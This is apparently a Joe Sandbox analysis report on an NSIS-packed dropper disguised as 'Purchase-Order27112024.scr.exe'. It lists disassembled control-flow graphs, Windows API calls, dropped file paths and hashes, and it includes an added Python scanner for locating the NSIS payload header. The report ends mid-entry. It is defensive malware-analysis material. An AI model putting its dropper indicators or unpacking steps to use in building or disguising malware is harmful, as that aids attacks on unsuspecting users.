• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID:
• API String ID: 310444273-0
• Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
• Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
• Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
• Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 177 403e73-403e88 175->177 178 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->178 176->175 179 403ce6-403cef 176->179 183 403ec8-403ecd call 4041e6 177->183 184 403e8a-403e8d 177->184 178->177 180 403cf1-403cfe SetWindowPos 179->180 181 403d04-403d07 179->181 180->181 185 403d21-403d27 181->185 186 403d09-403d1b ShowWindow 181->186 196 403ed2-403eed 183->196 188 403ec0-403ec2 184->188 189 403e8f-403e9a call 401389 184->189 191 403d43-403d46 185->191 192 403d29-403d3e DestroyWindow 185->192 186->185 188->183 195 404167 188->195 189->188 211 403e9c-403ebb SendMessageW 189->211 202 403d48-403d54 SetWindowLongW 191->202 203 403d59-403d5f 191->203 200 404144-40414a 192->200 199 404169-404170 195->199 197 403ef6-403efc 196->197 198 403eef-403ef1 call 40140b 196->198 207 403f02-403f0d 197->207 208 404125-40413e DestroyWindow EndDialog 197->208 198->197 200->195 205 40414c-404152 200->205 202->199 209 403e02-403e10 call 404201 203->209 210 403d65-403d76 GetDlgItem 203->210 205->195 212 404154-40415d ShowWindow 205->212 207->208 213 403f13-403f60 call 405f6a call 40419a * 3 GetDlgItem 207->213 208->200 209->199 214 403d95-403d98 210->214 215 403d78-403d8f SendMessageW IsWindowEnabled 210->215 211->199 212->195 244 403f62-403f67 213->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 213->245 218 403d9a-403d9b 214->218 219 403d9d-403da0 214->219 215->195 215->214 222 403dcb-403dd0 call 404173 218->222 223 403da2-403da8 219->223 224 403dae-403db3 219->224 222->209 226 403de9-403dfc SendMessageW 223->226 229 403daa-403dac 223->229 225 403db5-403dbb 224->225 224->226 230 403dd2-403ddb call 40140b 225->230 231 403dbd-403dc3 call 40140b 225->231 226->209 229->222 230->209 241 403ddd-403de7 230->241 240 403dc9 231->240 240->222 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f48 lstrlenW call 405f6a SetWindowTextW call 401389 251->253 252->253 253->196 262 40403a-40403c 253->262 262->196 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->200 267 40407f-4040ac CreateDialogParamW 264->267 265->195 266 404054-40405a 265->266 266->196 268 404060 266->268 267->200 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->195 269->195 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->200
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
• ShowWindow.USER32(?), ref: 00403D1B
• DestroyWindow.USER32 ref: 00403D2F
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
• GetDlgItem.USER32(?,?), ref: 00403D6C
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
• IsWindowEnabled.USER32(00000000), ref: 00403D87
• GetDlgItem.USER32(?,00000001), ref: 00403E35
• GetDlgItem.USER32(?,00000002), ref: 00403E3F
• SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
• GetDlgItem.USER32(?,00000003), ref: 00403F50
• ShowWindow.USER32(00000000,?), ref: 00403F71
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
• EnableWindow.USER32(?,?), ref: 00403F9E
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
• EnableMenuItem.USER32(00000000), ref: 00403FBB
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
• lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
• SetWindowTextW.USER32(?,004226E8), ref: 00404023
• ShowWindow.USER32(?,0000000A), ref: 00404157
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID: &B
• API String ID: 3282139019-3208460036
• Opcode ID: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
• Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
• Opcode Fuzzy Hash: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
• Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 277 40391f-403937 call 4062b2 280 403939-403949 call 405e8f 277->280 281 40394b-403982 call 405e15 277->281 290 4039a5-4039ce call 403bf5 call 405a9b 280->290 285 403984-403995 call 405e15 281->285 286 40399a-4039a0 lstrcatW 281->286 285->286 286->290 295 403a60-403a68 call 405a9b 290->295 296 4039d4-4039d9 290->296 301 403a76-403a9b LoadImageW 295->301 302 403a6a-403a71 call 405f6a 295->302 296->295 297 4039df-403a07 call 405e15 296->297 297->295 304 403a09-403a0d 297->304 306 403b1c-403b24 call 40140b 301->306 307 403a9d-403acd RegisterClassW 301->307 302->301 308 403a1f-403a2b lstrlenW 304->308 309 403a0f-403a1c call 4059c0 304->309 320 403b26-403b29 306->320 321 403b2e-403b39 call 403bf5 306->321 310 403ad3-403b17 SystemParametersInfoW CreateWindowExW 307->310 311 403beb 307->311 315 403a53-403a5b call 405993 call 405f48 308->315 316 403a2d-403a3b lstrcmpiW 308->316 309->308 310->306 313 403bed-403bf4 311->313 315->295 316->315 319 403a3d-403a47 GetFileAttributesW 316->319 323 403a49-403a4b 319->323 324 403a4d-403a4e call 4059df 319->324 320->313 330 403bc2-403bc3 call 4052c5 321->330 331 403b3f-403b5c ShowWindow LoadLibraryW 321->331 323->315 323->324 324->315 337 403bc8-403bca 330->337 333 403b65-403b77 GetClassInfoW 331->333 334 403b5e-403b63 LoadLibraryW 331->334 335 403b79-403b89 GetClassInfoW RegisterClassW 333->335 336 403b8f-403bb2 DialogBoxParamW call 40140b 333->336 334->333 335->336 341 403bb7-403bc0 call 40386f 336->341 339 403be4-403be6 call 40140b 337->339 340 403bcc-403bd2 337->340 339->311 340->320 342 403bd8-403bdf call 40140b 340->342 341->313 342->320
APIs
  • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
  • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
  • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
• lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 004039A0
• lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\googly\pulsation,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
• lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\googly\pulsation,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
• GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\googly\pulsation), ref: 00403A87
  • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
• RegisterClassW.USER32(004281A0), ref: 00403AC4
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
• ShowWindow.USER32(00000005,00000000), ref: 00403B47
• LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
• LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
• GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
• GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
• RegisterClassW.USER32(004281A0), ref: 00403B89
• DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                      • String ID: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\googly\pulsation$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                                      • API String ID: 914957316-3278138470
                                                                                                      • Opcode ID: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                                                                      • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                                                                      • Opcode Fuzzy Hash: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                                                                      • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 348 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bb4 351 402e16-402e44 call 405f48 call 4059df call 405f48 GetFileSize 348->351 352 402e0c-402e11 348->352 360 402f34-402f42 call 402d1a 351->360 361 402e4a-402e61 351->361 353 40305b-40305f 352->353 367 403013-403018 360->367 368 402f48-402f4b 360->368 363 402e63 361->363 364 402e65-402e72 call 4032f9 361->364 363->364 372 402e78-402e7e 364->372 373 402fcf-402fd7 call 402d1a 364->373 367->353 370 402f77-402fc3 GlobalAlloc call 4063ce call 405be3 CreateFileW 368->370 371 402f4d-402f65 call 40330f call 4032f9 368->371 397 402fc5-402fca 370->397 398 402fd9-403009 call 40330f call 403062 370->398 371->367 400 402f6b-402f71 371->400 377 402e80-402e98 call 405b6f 372->377 378 402efe-402f02 372->378 373->367 382 402f0b-402f11 377->382 392 402e9a-402ea1 377->392 381 402f04-402f0a call 402d1a 378->381 378->382 381->382 387 402f13-402f21 call 406360 382->387 388 402f24-402f2e 382->388 387->388 388->360 388->361 392->382 399 402ea3-402eaa 392->399 397->353 408 40300e-403011 398->408 399->382 401 402eac-402eb3 399->401 400->367 400->370 401->382 403 402eb5-402ebc 401->403 403->382 405 402ebe-402ede 403->405 405->367 407 402ee4-402ee8 405->407 409 402ef0-402ef8 407->409 410 402eea-402eee 407->410 408->367 411 40301a-40302b 408->411 409->382 412 402efa-402efc 409->412 410->360 410->409 413 403033-403038 411->413 414 40302d 411->414 412->382 415 403039-40303f 413->415 414->413 415->415 416 403041-403059 call 405b6f 415->416 416->353
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,00000400), ref: 00402DEC
                                                                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 00405BB8
                                                                                                        • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 00402E35
                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                      • String ID: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase-Order27112024.scr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$rQ$soft
                                                                                                      • API String ID: 2803837635-763302542
                                                                                                      • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                                                                      • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                                                                      • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                                                                      • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
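
                                                                                                      The routine at 00402DBC above (GetModuleFileNameW on its own image, GetFileSize, GlobalAlloc, the string fragments "Null", "soft" and "Inst", and the "Installer integrity check has failed" / "Error writing temporary file" messages) is the standard NSIS exehead loader: it re-opens the running executable and walks it for the NSIS "firstheader" that marks the start of the packed script and data. The following scanner reproduces that search so the overlay can be located without running the sample. It is an added example for this report, not code from the sample, from NSIS or from Joe Sandbox; the header layout follows the public NSIS source (Source/exehead/fileform.h), and the bytes in build_sample() are constructed, not taken from Purchase-Order27112024.scr.exe.

```python
"""Locate and parse the NSIS firstheader that the exehead stub searches for.

Added example for this report (not code from the sample or from Joe Sandbox).
Structure layout is taken from the public NSIS source, Source/exehead/fileform.h;
the sample image below is constructed for the test and is not the analysed file.
"""
import struct

FH_SIG = 0xDEADBEEF                       # firstheader.siginfo
FH_MAGIC = b"NullsoftInst"                # nsinst[3] as three little-endian ints: 'Null','soft','Inst'
FH_FLAGS = {1: "UNINSTALL", 2: "SILENT", 4: "NO_CRC", 8: "FORCE_CRC"}
# flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
FIRSTHEADER = struct.Struct("<II12sII")   # 28 bytes
STEP = 512                                # exehead only probes 512-byte aligned offsets


def parse_firstheader(buf: bytes, off: int):
    """Return a dict describing a firstheader at buf[off:], or None if the magic is absent."""
    if off + FIRSTHEADER.size > len(buf):
        return None
    flags, sig, magic, hdr_len, data_len = FIRSTHEADER.unpack_from(buf, off)
    if sig != FH_SIG or magic != FH_MAGIC:
        return None
    return {
        "offset": off,
        "flags": [name for bit, name in FH_FLAGS.items() if flags & bit],
        "header_len": hdr_len,            # size of the (compressed) NSIS header block
        "data_len": data_len,             # size of the payload counted from the firstheader
        # the stub reports "Installer integrity check has failed" when the declared
        # payload runs past the end of the file (or no firstheader is found at all)
        "truncated": off + data_len > len(buf),
    }


def find_nsis_header(buf: bytes):
    """Scan the image the way the stub does: test every 512-byte boundary in turn."""
    for off in range(0, len(buf), STEP):
        hdr = parse_firstheader(buf, off)
        if hdr is not None:
            return hdr
    return None


def build_sample() -> bytes:
    """Constructed test image: a dummy 1 KiB stub followed by an NSIS payload at offset 1024."""
    stub = b"MZ" + b"\x00" * (1024 - 2)
    header_blob = b"\xAA" * 0x40          # stands in for the compressed NSIS header
    data_blob = b"\xBB" * 0x100           # stands in for the packed data block
    data_len = FIRSTHEADER.size + len(header_blob) + len(data_blob)
    fh = FIRSTHEADER.pack(8, FH_SIG, FH_MAGIC, len(header_blob), data_len)  # flags=FORCE_CRC
    return stub + fh + header_blob + data_blob


if __name__ == "__main__":
    import sys
    # Run on a real file: python nsis_scan.py <installer.exe>; with no argument the constructed sample is used.
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(find_nsis_header(image))
```

                                                                                                      On a real NSIS-wrapped dropper the reported offset is where the packed script and payload begin, which is the region to carve for further unpacking; a header that parses but is flagged truncated is exactly the case in which the stub would show the "Installer integrity check has failed" dialog instead of extracting.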

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 545 401752-401777 call 402b3a call 405a0a 550 401781-401793 call 405f48 call 405993 lstrcatW 545->550 551 401779-40177f call 405f48 545->551 557 401798-401799 call 4061dc 550->557 551->557 560 40179e-4017a2 557->560 561 4017a4-4017ae call 40628b 560->561 562 4017d5-4017d8 560->562 570 4017c0-4017d2 561->570 571 4017b0-4017be CompareFileTime 561->571 564 4017e0-4017fc call 405bb4 562->564 565 4017da-4017db call 405b8f 562->565 572 401870-401899 call 4051f2 call 403062 564->572 573 4017fe-401801 564->573 565->564 570->562 571->570 587 4018a1-4018ad SetFileTime 572->587 588 40189b-40189f 572->588 574 401852-40185c call 4051f2 573->574 575 401803-401841 call 405f48 * 2 call 405f6a call 405f48 call 405724 573->575 585 401865-40186b 574->585 575->560 608 401847-401848 575->608 589 4029d0 585->589 591 4018b3-4018be CloseHandle 587->591 588->587 588->591 592 4029d2-4029d6 589->592 594 4018c4-4018c7 591->594 595 4029c7-4029ca 591->595 597 4018c9-4018da call 405f6a lstrcatW 594->597 598 4018dc-4018df call 405f6a 594->598 595->589 603 4018e4-402243 call 405724 597->603 598->603 603->592 608->585 610 40184a-40184b 608->610 610->574
                                                                                                      APIs
                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\googly\pulsation,?,?,00000031), ref: 00401793
                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\googly\pulsation,?,?,00000031), ref: 004017B8
                                                                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl791D.tmp$C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll$C:\Users\user\AppData\Local\googly\pulsation$Call
                                                                                                      • API String ID: 1941528284-3419546474
                                                                                                      • Opcode ID: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                                                                      • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                                                                      • Opcode Fuzzy Hash: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                                                                      • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 611 4051f2-405207 612 40520d-40521e 611->612 613 4052be-4052c2 611->613 614 405220-405224 call 405f6a 612->614 615 405229-405235 lstrlenW 612->615 614->615 617 405252-405256 615->617 618 405237-405247 lstrlenW 615->618 620 405265-405269 617->620 621 405258-40525f SetWindowTextW 617->621 618->613 619 405249-40524d lstrcatW 618->619 619->617 622 40526b-4052ad SendMessageW * 3 620->622 623 4052af-4052b1 620->623 621->620 622->623 623->613 624 4052b3-4052b6 623->624 624->613
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                      • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll), ref: 0040525F
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll
                                                                                                      • API String ID: 2531174081-872693572
                                                                                                      • Opcode ID: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
